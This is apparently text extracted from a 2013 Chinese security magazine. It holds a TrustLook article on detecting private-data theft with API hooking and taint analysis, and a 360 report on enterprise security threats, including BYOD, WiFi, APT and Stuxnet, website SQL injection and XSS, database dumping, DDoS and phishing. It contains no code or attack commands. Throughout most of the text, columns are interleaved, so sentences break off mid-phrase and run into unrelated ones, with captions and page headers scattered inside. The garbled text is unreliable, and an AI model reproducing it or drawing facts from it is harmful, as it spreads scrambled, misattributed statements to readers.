如上图所示，平台截获了收取用户信息的服 下一代的行为查杀技术：API TrustLook的一大特点就是结合了两种主流的 用户设备ID，无论是将其加密还是拆分，都不会 务端地址，同时准确的识别出了被窃取的信息是 Hook配合Taint Analysis 行为查杀技术。Hook API可以实现对控制流的监 影响判断。 设备ID。假如用户使用TrustLook的服务，就可 控：诸如后台发送短信，执行系统命令，后台安装

以立即发现Craig应用的恶意行为。 目前基于行为分析的查杀技术主要有两种思路： 应用等可以通过对相应API的拦截来识别的行为。 API Hook（挂钩系统调用）和Taint Analysis（污 TrustLook会逐步开放REST API给企业和 染分析）： 而Taint Analysis在这里并非用来检测漏洞， 演示：谁偷了我的电话号码 个人开发者，方便整合到其它产品中。 而是用数据流追踪技术来监控隐私数据的流向。这 是API Hook技术难以做到的。举例来说，如果一 为演示TrustLook的数据流追踪功能，我们自 个应用试图读取用户的通讯录，并且通过HTTP发 定制了一个应用，实现了一个常见的恶意行为： Hook API: Taint Analysis: 送到远程服务端，在通讯录数据进入内存的第一时 获取本机电话号码，并通过HTTP GET请求发送 刻，其所在内存片段就会被标记为“敏感”的（在 走。检测结果显示这个应用可以绕过大多数主流 在虚拟机的所有的系统API中设下Hook， 源于学术界的一种思想，最初被用来检测二进 TrustLook自订制的Android系统底层实现）。而 的杀毒软件及Google Play的审核。 一旦待检测软件运行，就可以立刻获取其 制程序中的漏洞（Memory corruption 执行过程中一旦有“敏感”的数据被通过网络函数 函数的调用序列以及参数。进而根据风险 vulnerabilities）。这种技术可以把所有来 发送走，我们便知道是发生了隐私数据偷窃。这也 而在TrustLook平台上，我们可以立刻得到偷 模型判断是否存在恶意行为。这是一种针 自用户的输入都认为是“脏”的，在其进入内 是图6的分析报告中我们能够明确断定发送走的是 窃行为的细节： 对控制流的追踪技术。在近年很火的“下 存的第一时间就对相应的内存区段做了标记。 一代防火墙”中，这种技术也常被用来做 而在程序的执行过程中，如果进程对“脏”内 基于行为的查杀。Hook API技术经过 存进行了诸如读取，运算并写入内存等操作， 了时间的检验，已较成熟，实现也相对 相应的目标寄存器和目标内存区段也会被标记 简单。 为“脏”的。如果在某一时刻，决定程序执行 流程的指针被“脏”数据控制了，则判定触发 了漏洞。这是一种针对数据流的追踪技术。不 久前上市的硅谷安全公司FireEye便在其产品 中使用了Taint Analysis技术。这种技术在 工业界的应用才刚开始，但潜力很大。 图8 平台识别了偷窃行为，截获数据包

也许把电话号码带在参数里太明显了？我们修改了应用，不直接发送，而是拆成3部分来发送。此时，已 经没有任何一款杀毒软件会报恶意行为了。而TrustLook依然能够识别：

图9 只发送了3位电话号码，识别

图6,7 污染分析的原理：基于“脏”数据得到的数据也是“脏”的

070 ｜ 互联网安全 互联网安全 ｜ 071 ISC专题 ISC ARTICLES

如果拆成一位一位的发送呢？

图10 一位一位发送，识别

我们做一个极端的实验：把电话号码经过了多次AES加密再发送，所有安全软件到这里已全军覆没。 而TrustLook不仅识别出了这里发送走的是电话号码，还获取到了加密的密匙：

图11 经过多次AES加密，识别，并得到key

可见，TrustLook用其独有的数据流追踪技术，可以从更细粒度上追踪恶意行为，从根本上保证隐私 数据安全。

072 ｜ 互联网安全 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

况，为企业内部终端进行统一的查杀病毒、 对于那些租用固定网络带宽，同时员工数量 互联网时代的企业安全发展趋势（下） 修复漏洞和产品更新等操作，还可以为每个 又比较多的企业来说，影响尤为明显。 终端配置正确的安全策略，并能在出现问题 中国企业安全现状分析 而使用企业版安全软件，则可以通过控制中 时及时收到报警通知，从而有效地避免木桶 心端的缓存数据，进行二次分发，给内网用 效应的影响。 户统一升级、统一打补丁，从而在最大程度 1. 企业内部信息安全 全防护，却可能导致其内网用户的电脑系统 2) 内部软件或网址易遭安全软件误报 上减少升级、打补丁等联网操作对企业网络 信息技术对于企业是提高生产和管理效率的 无法在第一时间安装漏洞补丁，安全软件也 带宽的占用。 不能实现及时有效的安全更新，客观上反而 工具，但同时也成了攻击者的武器。 很多企业都会使用一些内部专用的软件。由 使内网系统处于一种更加不安全的状态，一 于这些软件并未公开发行，也没有接受过安 4) 办公电脑混用 目前，在中国工商行政管理总局注册的企业 旦遭遇木马病毒的入侵，就可能造成严重的 全公司的检测，并且某些敏感的操作可能和 有 1100万家，随着社会信息化进程的加速， 系统破坏。 在办公电脑安装与工作无关的个人应用，将 病毒木马比较接近，因此很有可能被安全软 信息化技术在这些企业运营过程中的作用越 办公的业务数据、企业的保密数据与个人应 件误判为恶意软件。也有一些企业需要用一 与个人电脑安全不同，企业安全属于一种集 来越重要，而企业信息化进程中所暴露的安 用数据之间无隔离同盘存储是目前各个企业 些远程控制软件管理网络或者终端，某些远 体安全问题。一般来说，联入内网系统的电 全问题也越来越受到社会的关注。 网络管理、应用管理、安全管理所面临的一 程控制软件甚至与木马功能类似，因此也很 脑中，只要有一台电脑被黑客攻破，那么 个重要问题。 敏感信息泄露、重要数据被破坏、业务系统 有可能被个人版安全软件当做木马病毒或可 就有可能造成内网安全体系的崩溃和商业机 被非法控制、商业信誉遭恶意言论攻击，这 疑程序予以禁止或删除。 密的泄漏。也就是说，安全性最差的一台 在办公电脑上任意安装个人软件将带来非常 些利用信息化系统实施的攻击行为，轻则损 严重的安全隐患，大量来源不明、随意下载 电脑实际上就决定了整个企业内网系统的安 另外，某些企业，包括某些大型国企，为了 害企业的经济利益，重则造成重大的社会影 全级别，这就是企业安全问题中的“木桶 的应用软件自身安全漏洞频出，为攻击者留 使用方便，经常会用自己内网专有的 DNS， 响，甚至危及国家安全。 效应”。 下大量低成本的可乘之机，更严重的是，很 将本来不是自己企业注册的域名重定向到企 多未经验证和鉴别的应用软件本身就含有木 1.1. 企业面临的安全问题 1) 缺乏统一管理容易形成木桶效应 业内部的办公系统。而相同的域名在公共互 马、病毒等恶意代码。这些被植入恶意代码 对于拥有大量商业机密并且对信息安全保护 联网上可能也会同时存在，只是普通用户与 的主机很可能成为发起 DDoS攻击的僵尸主 要求较高的企业来说，仅仅使用个人版安全 如前所述，安全性最差的一台电脑实际上就 企业内网用户的 DNS 解析结果不同而已。如 机，甚至成为进一步渗透企业内网，完成 APT 软件确实存在一定程度的安全隐患。 决定了内网系统的整体安全级别。而对于使 果公网上相同域名的网站恰好是钓鱼网站或 攻击的重要跳板。 用个人版安全软件的企业来说，很难掌握员 挂马网站，那么当企业内网用户请求访问该 目前，U 盘是黑客对企业用户发动攻击的常 工的电脑安全水平，也很难对企业内网安全 5) 漏洞修复滞后 域名时，就有可能被个人版安全软件拦截， 用媒介。由于很多企业都会对内网系统进行 状况进行全面的了解和监控。安全维护只能 从而形成误报。 补丁的下载与漏洞修复最关键的是及时性、 隔离保护 ：有的是在网络层隔离，有的则干 依赖于员工个人的职业技能和安全素养。另 全面性，否则稍有延迟、稍有遗漏就有可能 脆进行物理隔离。对于这种与世隔绝的网络， 外，一旦有员工电脑被感染或是企业内网被 3) 每台电脑独立升级占用企业上网带宽 使得内网安全功亏一篑。 U 盘就成为了一个很好的木马载体。除了 U 入侵，网络管理员也很难及时地发现和解决 盘病毒外，针对办公软件发动攻击的宏病毒 问题。 每台电脑独立升级占用企业上网带宽。个人 目前对于国内的大部分企业（既包括中小型企 和利用局域网系统传播的 ARP 病毒，也是对 版安全软件一般都是各自独立进行升级、打 业，也包括大型企业）来说，全面统一监控终 而使用管理功能较强的企业版软件，终端的 企业用户威胁较大的病毒。 补丁等操作。而对于企业用户来说，如果每 端漏洞状况的监控系统并未建立 ；统一管理终 安全状况都会汇总到一个控制中心，网络的 个员工电脑都要独立地联网升级，就会占用 端补丁，对终端进行统一补丁分发与安装的控 某些企业简单地通过内外网的隔离来进行安 管理员可以通过管理平台掌控全网的安全状 大量的网络带宽，影响正常的上网速度。这 制系统并未建立 ；有效避免外连升级服务器导

074 ｜ 互联网安全 互联网安全 ｜ 075 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

致出口堵塞的专用企业补丁分发系统并未建 私建无线热点，很可能因为没有专业的安全 9) 安全制度落实 立。在这种情况下对于国内的大多数企业来说， 配置，在原有经过严密规划过的纵深安全防 完善的安全体系建设需要有产品作基础、有 如 ：攻击技术的不确定性、攻击途径的不确 及时更新补丁，全面修复漏洞还不具备基础， 御体系上打开了一个非法接入的网络入口， 技术作保障、有服务作配合、有制度作管理。 定性、鉴定结论的不确定性，安全说到底是 企业内网安全仍将由于漏洞修复的不及时、不 使得入侵者可以毫不费力地绕过所有边界安 只有产品、技术、服务、制度协调配合，多 要解决人（包括攻击者、被攻击者）的问题， 全面而存在于大量的威胁之中。 全防护产品和措施直接进入到企业内部核心 管齐下，才能有效保障企业内网的安全。 网络实施攻击。这对于企业的网络安全体系 而不是解决技术本身的问题，这使得安全防 终端安全缺失 6) 来说，毫无疑问是非常致命的。 御工作、安全体系构建工作必须综合考虑方 安全问题不只是技术问题，究其根本，安全 案、技术、产品、人、制度等多方面因素， 终端安全防范是信息安全领域出现最早的一 问题是人与人、人与组织围绕着利益的对抗 另外一方面， 伪造的无线热点成为钓鱼和欺骗 才能实施有效的防御措施。 种安全防范形式，其中，终端杀毒软件作为 行为，因此安全问题具有诸多的不确定因素， 的工具，随意接入 Wifi热点，如公众场合 ： 最主要的终端安全防范措施已经有近 年的 30 机场、宾馆、咖啡厅、商场等，对于很多企 历史，发展到现在，以终端杀毒软件为核心 业的员工在使用移动设备（如笔记本）在接 的终端安全防护措施已成为构建企业安全防 图 1 入到企业提供的 Wifi AP接入时，存在着被伪 护体系不可缺少的重要组成部分。 造的热点钓鱼欺骗和劫持的危险。

根 据 360互联网安全中心 2012年的抽样 8) 移动终端接入 调查统计，国内企业普遍存在用免费的个人 版安全软件代替企业版安全软件的情况。在 随着近两年移动互联技术的迅速发展，移动 接受调查企业中，国有大中型企业使用企业 互联网不仅仅渗透到了我们生活的方方面面， 版安全软件的比例较高，达到 78%；而中小 而且还将渗透到我们的工作当中，Bring your 企业的情况则让人担忧。配备企业版安全软 own device（BYOD）正在成为一种趋势，但 件的比例不足 5%，约 94%的中小企业仅为员 同时也带来了安全问题。BYOD 使得个人和工 工电脑安装个人版安全软件，还有 1%左右的 作任务在同一设备上混合。联系人名单、电 企业根本不使用任何安全软件。 子邮件、数据文件、应用程序和访问互联网 可能面临挑战。理想的情况下，用户希望他 7) Wifi 缺乏管理 信息来源 ：360互联网安全中心 (2013年 1 月 )

们的个人资料和活动与工作分开。在个人时 目前国内使用 Wifi的企业非常普遍，特别是 间访问个人照片、短信、电话，上网浏览需 中小型企业，甚至已经取消了传统有线网络， 1.2. 企业移动信息安全 要个人隐私保护，而工作时间内完成的文件、 完全依靠 Wifi进行办公，而这些广泛采用 1) 手机恶意软件款数激增，同比增长达 占全部新增样本数量的 71%，感染量达 档案，使用企业数据的应用程序和互联网浏 Wifi信号的企业基本上都没有有效的 Wifi管 1907% 51746864 人次，占恶意软件感染总次数的 览需要符合企业政策。 理措施，完全在无管理、无防护的状态下使 78%，成为手机恶意软件的主要感染平台。 2012年，360互联网安全中心新增手机 用 Wifi来办公和提供业务服务，这已经成了 目前国内外大部分企业还没有一套完整的解 2012年 12 月，其更以单月新增 30809 款达 国内企业，特别是中小企业必须面对和解决 恶意软件样本174977 款，同比 2011年增长 决方案来应对 BYOD带来的安全威胁，面对 到历史新高。 1907%，感染人次 71664334 人次，同比 2011 的现实安全问题。 应用环境的改变，如何确保企业信息资产的 年增长 160%。 2) 系统漏洞频发，涉及数百款机型 安全，同时又享受 BYOD 带来的便捷，这成为

企业安全管理的一个难点。 其中，Android 平台以新增样本 123681 款， 2012 年中，更多手机恶意软件还开始利用

076 ｜ 互联网安全 互联网安全 ｜ 077 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

手机平台中存在的系统漏洞来进行攻击，如 2012 年中，在智能手机用户持续增长的同时， 图 3 2012 年 10 月，三星 Galaxy 系列手机被曝存 隐私安全问题也愈发引人关注，大量因手机 在拨号指令漏洞，可被利用使用户误格手机 ； 丢失导致隐私泄漏的案例和多款手机 APP 应 用被曝存在后台收集用户通讯录、手机短信、 三星、魅族、小米等手机的芯片组被曝存在 监听通话内容甚至录音的行为，使得隐私安 内核驱动漏洞，直接涉及如 Galasy S3 、Note2 全问题已经濒临大规模爆发的临界点 , 任其发 等数百款主流机型。 展后果将十分严重。

一系列安全漏洞的出现，也使得手机终端厂 例如，2012 年中，360 手机卫士相继查杀如 商开始愈发重视设备安全问题，如在一系列 专门盗取短信、IMEI(手机串号 )、Google 账 漏洞出现之后，终端厂商和芯片厂商都在第 号等隐私信息的 DroidDreamLight 系列手机恶 一时间做出了快速响应，升级系统版本、提 意软件，可窃听通话、盗取短信内容的 X 卧 供修复补丁等解决方案等。

3) 隐私安全危机濒临爆发临界点 信息来源 ：360互联网安全中心 (2013年 1 月 )

底系列间谍软件最新变种等，其可通过巧妙 1.3. 企业安全的重磅杀手 ：APT 图 2 伪装植入用户手机，获取录音、联网等权限 对于中国大型支柱性企业来说，外部威胁不 后盗取用户隐私，行踪隐蔽，让用户很难察觉。 断升级，来自已经军事化到了牙齿的网络对 4) 非越狱 Iphone 也存在 iOS 安全危机 手的攻击，防御之难甚至无法想象，伊朗核 电站的震网事件历历在目，继二战末期推出 2012 年中，此前被认为因相对封闭，而安全 原子弹之后，美国又在网络信息战中推出了 系数较高的 平台中也开始出现一系列安 iOS 核武器级别的网络攻击工具 ：APT 全问题，如在同年 8 月，法国黑客发现的 iOS 短信漏洞可将诈骗短信伪装成合法的身份， APT（高级持续性威胁）作为一种新的攻击形 诱骗用户接收、点击其中的短信链接等，由 式俨然在全球信息安全领域掀起了新一轮网 于这一漏洞在非越狱手机中也同样存在，更 络安全军备竞赛。 使用户极易落入短信欺诈陷阱之中。 反复渗透、巧妙植入、长期潜伏、精确打击 同时，随着大量用户开始购买和同时使用多 是 APT攻击的典型特点。 台 iOS 设 备， 如 iPhone、iPad、Mac 等， 在 通过先进的攻击手段，精确地选择攻击目标 信息同步过程中也开始出现一系列安全问题， 进行持续性的攻击，攻击成功率接近惊人的 如一旦黑客成功破译 Apple ID 账号，可导致 信息来源 ： 互联网安全中心 年 月 360 (2013 1 ) 100% ，到目前为止，国际上已公布的典型 用户的 iMessage 信息、安装的应用列表、以 APT攻击的防御均以失败告终。高价值商业机 及 iCloud 数据被轻易同步到另外的 iOS 设备 密信息、高价值国民经济数据、高价值军工 上，直接盗取隐私信息等。

078 ｜ 互联网安全 互联网安全 ｜ 079 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

设计图纸等等事关国计民生的机密信息早已 路，这些都说明，企业要做到APT 的有效防御， 成为国外谍报组织重点渗透的目标，通过网 必须抛开常规的技术、抛开常规的安全产品、 图 4 络攻击手段获取这些数据已经在传统的保密 抛开常规的防御思路，尽可能寻找理论上能 战场之外开辟了一块难度更大的新型保密战 够保障核心资产运行安全的防御思路。经过 场，国有大型支柱性企业的网络安全系统建 实践证明，奇虎 360的内网安全防护体系和 设是我们在这场战争中生存下来的重要保障。 思路在APT 防御方面走在了中国企业内网安 全APT 防范的前列。 事实证明，传统安全防护设备、防护思路在 APT攻击面前已经不堪一击，防护 APT攻击需 APT攻击相比普通病毒攻击有如下不同（参见 要采用更先进的技术、更先进的产品、更严 图 4）： 格的管理。 国家互联网应急中心报告显示，2012年，我 传统的安全防御设备大多数依赖于云、信誉 国境内至少有 4.1万主机感染了具有APT 木马 评价（ ERT ）和病毒签名等，他们的优势在于 特征的程序，对国家和企业数据安全造成严 面对已知威胁的检测稳定可靠。但同时这种 重威胁。 技术体系的缺陷也非常明显，就是构架于信 信息来源 ：360互联网安全中心 (2013年 1 月 ) 在 2013年，有国家背景的个人或有组织的团 誉评价、已有特征、签名技术思路之上的检 体将继续使用网络战术，企图损害或破坏其目 测体系对于那些未知的攻击、未知的漏洞、 标信息或资金的安全。我们将看到网络威胁的 植入了木马文件（伪造有效的数字签名），成 子在来自互联网的攻击面前却十分脆弱，很 未知的病毒木马完全失效，而 APT攻击之所 力量相当于武力的威胁，国家 / 组织甚至个人 功绕过安全产品的检测。利用Windows和西 多企业由于自身官网被黑客入侵导致蒙受巨 被称为网络信息战中的核武器，就是因为 APT 团体会使用网络攻击，显示自己的“实力”。 门子系统漏洞，成功入侵离心机的控制系统， 额经济损失，并严重影响了企业自身形象， 攻击采用的都是0day 漏洞、未知木马、未知 修改了离心机参数，干扰其正常运行，但控制 造成用户流失等一系列恶意影响。 攻击手法，在这种情况下，突破传统安全防 APT攻击案例 ： 系统却显示一切正常。在 2011年 2 月的攻击 护设备的检测就变得非常简单。 1) 网站漏洞遭受攻击方式 ： 中，伊朗纳坦兹铀浓缩基地至少有 1/5 的离 伊朗的核设施拥有一个物理隔离、高度防护 根据 360 网站安全检测平台的抽样统计显 另一方面，现有安全防护体系是一套纵深防 心机因感染该病毒而被迫关闭。 的网络，但是在APT 攻击下，核设施参数被 示，75.6% 的国内网站存在高危安全漏洞，而 御的立体防御体系，其构建思路是对各种可 修改，核进程被推迟几年。 面对可能遭受的信息泄露或被利用做攻击的 39.6%的网站存在大量高危安全漏洞。黑客可 能进入到企业内网、接触到核心资产的网络 发起方，企业需要安装专业的企业级防护软 以利用这些漏洞入侵网站系统，夺取最高权 路径进行穷举、演绎，然后在这些可能的路 攻击者对伊朗核设施进行了为期数月甚至更 件，采取有效措施避免。 限，篡改网页内容，窃取数据库信息。 径上层层设卡，部署设备。而已经发生的 APT 长时间的潜心准备，搜集应用程序与业务流程 攻击已经说明，攻击者完全可以通过思路创 中的安全隐患，定位关键信息的存储位置与通 2. 企业外部信息安全 目前已知的各类高危网站漏洞大约有 1000 多 信方式，在这个 攻击中，名为 的 新结合技术创新，不走寻常路，找到一条新的， APT Stuxnet 2.1. 企业网站安全问题趋势分析 种。不过，从 360 网站卫士拦截漏洞攻击的 没有被穷举、演绎过的渗透途径，甚至可以 计算机蠕虫病毒使用 USB移动介质作为跳板， 随着电子信息化的高度普及，越来越多的企 数量统计来看，遭黑客攻击量排名前两位的 不是网络途径，绕开所有的检测设备关卡， 业开始建立自己的企业官方网站，通过企业 安全漏洞分别是 ：跨站脚本漏洞和 SQL 注入 直接进入到内网，接触到核心资产。我们对 网站对外发布信息，以及进行相关产品发布 漏洞。针对这两个漏洞的攻击量之和，占到 震网事件进行复盘的时候就慨叹于美军和以 宣传等。企业网站已经成为企业对外的一面 了网站卫士拦截的漏洞攻击总量的 96.6% 。另 色列采用极具创新的“ 盘摆渡”的技术思 U 镜子，折射出企业自身的形象。但是这面镜 据 360 网站安全检测平台的统计结果显示， 在所有被检测出存在高危安全漏洞的网页中，

080 ｜ 互联网安全 互联网安全 ｜ 081 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

电子邮件、电话号码、住址、信用卡号的最 2012 年，360 网站卫士共接到遭遇流量攻击 存在上述两种漏洞的网页占到了总量的 93% 如前所述，由于大量网站存在高危安全漏洞， 后四位等。6 月， 1500 万 eHarmony（相亲网站） 的网站求助 1297 起，平均每天拦截各种流量 以上。 就为黑客入侵网站提供了可乘之机。2012年， 攻击 659 波次，平均每天约有 14%的网站卫 网站遭遇黑客攻击的事件频频发生，拖库与 密码和 3 万 LinkedIn（社交网站）密码被破解， 士用户遭到流量攻击。在网站卫士拦截的各 高危 ：SQL注入、任意文件操作、任意代码执 篡改的案例时有发生。所谓拖库，是指黑客 遭破解的帐号和密码被公布在网络论坛上。7 种流量攻击中， CC（Challenge Collapsar ）攻 行、任意命令执行、文件包含等 入侵网站后将网站数据库中的数据导出。而 月，雅虎旗下网站 Yahoo Voice 遭黑客攻击， 击最为常见，约占流量攻击拦截总量的 90% 黑客拖库的主要目标就是窃取用户的帐号、 45.3万用户信息被曝光在网上，被张贴在网 中危 ：跨站脚本攻击 、 、越权访问、 (XSS) CSRF 上的信息包括用户名和明文密码。 以上。 Email和密码。 其他逻辑漏洞等 根据 360 网站卫士的用户反馈 ：绝大多数的 大量知名网站遭遇拖库 一个网站遭遇拖库，其他网站的用户帐号也 低危 ：信息泄漏、URL跳转、暴力破解等 会受到威胁。 流量攻击都是竞争对手雇佣黑客进行的恶意 国内方面，2012 年 6 月，某知名网址导航被 攻击，也有一部分网站是因为拒绝了网上讹 另据 360 网站安全检测平台的安全性评分系 曝因 SQL 注入漏洞致使大量用户详细资料泄 3) 流量攻击威胁中小网站生存 诈之后，遭到了黑客的报复打击。中小网站 统显示，在首次接受安全检测的十个主要类 露 ；12 月，国内某著名电商网站曝出验证码 在面对流量攻击时往往束手无策，只能通过 别的网站中，政府网站的成绩排名垫底，平 除了网页篡改和拖库风险之外，中小网站 设计缺陷，用户认证缺陷，可被暴力破解， 重新启动服务器的方式来恢复系统。但恢复 均得分仅为 35 分（百分制）。紧随其后的是 往往还必须面对一种实际威胁更大的黑客 导致大量账号信息泄露。 后的系统仍然无法防御新的流量攻击。 高校网站，平均得分为 37 分。这样的成绩意 攻击——流量攻击。流量攻击，简单地说

味着，政府和高校网站非常容易被黑客入侵、 国际方面，2012年 1 月，亚马逊旗下的电子 就是攻击者在同一时间对某个网站发起大 由于流量攻击并非针对网站的任何技术漏洞， 篡改数据和窃取资料。 量的访问请求，当访问量大大超过网站服 而是一种纯粹的挑战系统极限的暴力攻击， 商务网站 Zappos 被黑客入侵，2400 万用户 务器的承受能力时，就会造成网站系统瘫 因此，理论上说只能通过增加网络带宽，提 的账户信息被窃取，被窃信息包括用户姓名、 2) 拖库风险与篡改现象日益加剧 痪、服务器无响应、无法访问、无法登录 高服务器响应能力的方法来解决。但提高系 等异常现象。 统容量又势必大幅增加运营成本，这对于中 图 5

图 6

信息来源 ：360互联网安全中心 (2013年 1 月 ) 信息来源 ：360互联网安全中心 (2013年 1 月 )

082 ｜ 互联网安全 互联网安全 ｜ 083 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

互联网安全中心 2010-2012 年捕获的新增 境外地区（76.3%）和香港地区（13.2%），二 网页挂马对大众网民的危害已经日益减弱。 小网站来说，通常是难以承受的。 钓鱼网站数（万）和云查询拦截的钓鱼网站 者之和达到 89.5% 。这也就为有关部门通过法 访问量（亿）。从图 9 中可以看出，钓鱼网站 律手段监管和打击钓鱼欺诈行为制造了很大 4) 病毒木马的绝对数量呈明显下降趋势 相应的，以云存储为代表的网络存储和共享 无论从数量上还是活跃程度上都呈现快速增 的困难。现阶段，安全厂商通过技术手段来 服务开始被黑客利用藏毒传毒。2012 年，网 长的势头。 识别和拦截钓鱼网站，仍然是打击钓鱼网站 日均查杀黑文件数下降 25%（2011年为 2800 盘服务流行度不断提升，娱乐、办公等用户 万，2012年为 2100万），后台样本上传量和 最为切实可行的方式。 间通过网盘分享文件愈发便利，一些黑客攻 从地域分布的角度看，钓鱼网站主要分布在 木马发现量持续下降，样本上传量从 2010年 击者也开始将木马病毒伪装为热门网络资源，

底的日均 700万下降到 320万，木马日检出 以分享网盘文件链接的方式进行传播。尤其 图 8 量从 60 万下降到 45 万。 是在微博等社交平台上，此类木马传播方式 已相当普遍，值得用户高度警惕。 5) 网络存储和共享成为木马新兴渠道 6) 钓鱼网站呈现快速增长势头 自 2010 年以后，安全浏览器的普及程度大幅 提高，配合安全软件的共同使用，挂马网页 2012年， 360互联网安全中心截获新增 的攻击成功率急剧下降。从图 8 中可以看出， 钓鱼网站 87.3万个（以 Host计算），较 2011 360互联网安全中心 在 2011 年对挂马网 年增长 73.9%；钓鱼网站的云查询拦截量为 页的拦截量为 2010 年的 12.9%，而 2012 年又 81.0 亿次，较 2011 年增长了 273.3%，是同期 仅为 2011 年的 14.0% 。从这组统计数字来看， 挂马网页拦截量的近 200 倍。图 9 给出了 360

图 7

信息来源 ：360互联网安全中心

图 9

信息来源 ：360互联网安全中心 (2013年 1 月 )

信息来源 ：360互联网安全中心

084 ｜ 互联网安全 互联网安全 ｜ 085 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

新型网络钓鱼的特性 ： · 利用网站的URL 跳转漏洞构造钓鱼网站链接 程序检测出安全问题，从而进一步利用漏洞 金钱对黑客来说永远是极大的诱惑。目前市 进行黑客入侵行为。由于是外包开发，当出 面上已有很多开源的电子商务系统，同样也 利用 （基础连接认证）方式钓鱼 · 欺骗性 ：具有极大的欺骗性 , 网络钓鱼者 · HTTP Auth 现安全问题之后很难及时地修复安全漏洞， 存在着一些安全漏洞，如果企业网站运维人 漏洞骗取用户密码 利用自己的站点去模仿被钓网站的页面， 导致黑客可以长期控制企业网站服务器，将 员不及时安装补丁将会导致黑客入侵官网。 类似于克隆一样，然后结合含有近似域名 企业网站服务器变为黑客手里的“肉鸡”或 此外，一些涉及到在线支付的企业网站通常 将恶意链接作为图片网址发在论坛帖、博客 的网址来加强真实程度。网络钓鱼者甚至 者“跳板”，对企业自身的形象造成长期的恶 会有很多第三方的接口，包括支付接口、授 文章和评论、邮件正文等处，使其他用户访 入侵正规的网站服务器，利用正规的网站 问时页面自动弹出“登录框”。如果用户不加 意影响。 权接口、客服接口等，牵涉到第三方的接口 进行钓鱼传播，让被钓鱼者难以分辨真假。 辨识，会误以为需要再次登录，就会将帐号 越多，带来的安全风险越大，黑客可以通过 开源程序建站，缺乏安全运维意识 · 入侵第三方的服务器来影响企业官网的整个 · 结合性 ：钓鱼者会利用网站、操作系统以 密码发送到黑客服务器上。 支付流程，实现中间人劫持、伪造页面、篡 及程序的安全漏洞进行钓鱼攻击，例如 ： 目前市面上已经有许多开源的建站系统可 2.2. 为什么企业网站容易遭到攻击？ 改支付信息等攻击行为。 利用浏览器或者网站的一些漏洞去构造钓 供企业选择，常见的有 Dedecms、Discuz、 鱼地址，或者利用漏洞等欺骗手段种植木 1) 企业网站是 APT 攻击中的关键步骤 phpcms等。由于这些建站系统均是开源产品， 4) 企业间恶性竞争，攻击成本低 马等等。 意味着黑客可以通过研究这些开源建站系统 企业网站的受众主要是企业员工和客户，所 的源代码来挖掘漏洞。当黑客挖掘到一个开 根据 360 网站卫士的数据分析显示，很多 · 多样性 ：钓鱼者不会千篇一律地使用伪造 以在针对企业的APT 攻击中，攻击者往往会 源建站程序的漏洞时，通过结合搜索引擎技 DDOS攻击都是企业所在行业内部的竞争对手 网站和虚假邮件等手法 , 结合更多的网络 选择企业网站作为跳板。 术，批量搜索同样使用这套程序的网站，实 发起，目前针对网站发起 CC 攻击的成本很低， 服务如搜索引擎、社交网站、即时网络通 360互联网安全中心近期捕获的跨国生物 现批量入侵。一般来说，系统开发商发现有 通过代理或者一台普通的服务器即可发起大 信等，使用更多容易受骗的形式去骗被钓 制药企业凯莱英医药集团官网遭黑客入侵 黑客利用漏洞进行入侵行为后会尽快开发相 量 CC 攻击请求，目标网站由于无法处理大量 者，在更短的时间内得到最好的效果。 就是一个典型案例。黑客在其官网中英文 应的补丁来告知用户，但是很多企业网站缺 访问请求从而导致失去响应，网站无法打开。 少专业的运维人员或者站长缺少安全运维意 遇到 DDOS攻击时，企业网站自身没有有效的 网络钓鱼欺诈途径 : 站点均嵌入恶意代码，向凯莱英员工或来 访客户电脑植入木马后门。技术分析表明, 识，没有及时安装补丁或者根本不关注厂商 防御措施，只能购买安全厂商的防拒绝服务 · 基于搜索引擎的钓鱼攻击行为 ： 该木马传播时综合利用了IE（三个漏洞） 官网发布的补丁更新信息，导致存在漏洞的 设备进行流量清洗或者使用 360网站卫士此 、Office、Adobe PDF Reader和Java运 企业网站长期暴露在互联网上，成为黑客攻 类的云防护解决方案。 钓鱼网站与黑客进行合作、通过入侵控制权 行环境（JRE）的六个漏洞组合挂马，同时 击的目标之一。 重高的政府网站、教育网站，通过劫持搜索 对攻击样本进行了变形免杀。 2.3. 企业网站被攻击和入侵的危害 引擎来获取流量。 · 企业网站开发人员缺乏安全编程意识 1) 企业被渗透，核心资料外泄等 2) 企业网站本身安全隐患多，容易被攻陷 · 基于木马的钓鱼攻击行为 ： 由于人的因素不可控，导致很多企业网站在 企业网站作为防 APT的一个环节通常是最脆 · 外包建站，代码质量差，缺乏后期持续的 开发过程中就引入了安全漏洞，这些漏洞在 弱的，黑客一旦通过企业网站将木马植入企 钓鱼网站以不可思议的低价来吸引用户浏览。 技术维护 测试环节缺乏有效的安全测试，上线后可以 业员工电脑中就很容易进行内部渗透，继而 让用户由网站上下载由木马伪装的“电子折 被漏洞扫描器检测，引发后续一系列的黑客 取得更高权限，进行窃取企业核心资料等侵 扣券”或是“实物照片”。 很多企业由于自身没有网站研发团队，将企 攻击。网站开发人员不了解安全编程的同时 害行为。 业网站外包给建站公司制作，市面上很多建 也不了解黑客攻击，此类安全隐患在不借助 钓鱼者通过即时通信软件的文件传输，透过 站公司开发水平参差不齐，更重要的是普遍 第三方防御机制的帮助下很难被发现和修复。 企业商业机密一旦外泄，将会给企业带来不 社会工程学手段主动让用户接受文件，攻击 的建站公司开发网站只考虑功能性，而不考 可估量的巨大损失。 者会声称某某商品大降价，请点击链接查看 虑安全性，在满足了企业网站的功能后便交 3) 电子商务或在线交易的金钱诱惑 商品详情，点击的用户就有机会中招。 付使用，此类网站很容易被通用的漏洞扫描

086 ｜ 互联网安全 互联网安全 ｜ 087 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

软件、安全浏览器拦截并提示风险网站，这 2) 在线交易等风险带来的直接财产损失 图 1 样会对企业的商誉带来无形的损失。 有电子商务业务的企业网站一旦被攻破，涉 及财务的模块、企业收款账号等很可能被篡 4) 网站打不开，丧失商机 改，给企业带来直接的财产损失。 网站被 DDOS 攻击或者被当成肉鸡攻击别人， 3) 网站被篡改、挂马导致被安全软件拦截， 都会造成企业带宽被占满的情况，这样就会 损失商誉 导致企业网站打不开。访问企业官网的客户 打不开企业网站，会直接导致损失客户，失 企业网站一旦被挂马、篡改等，就会被安全 去商机。

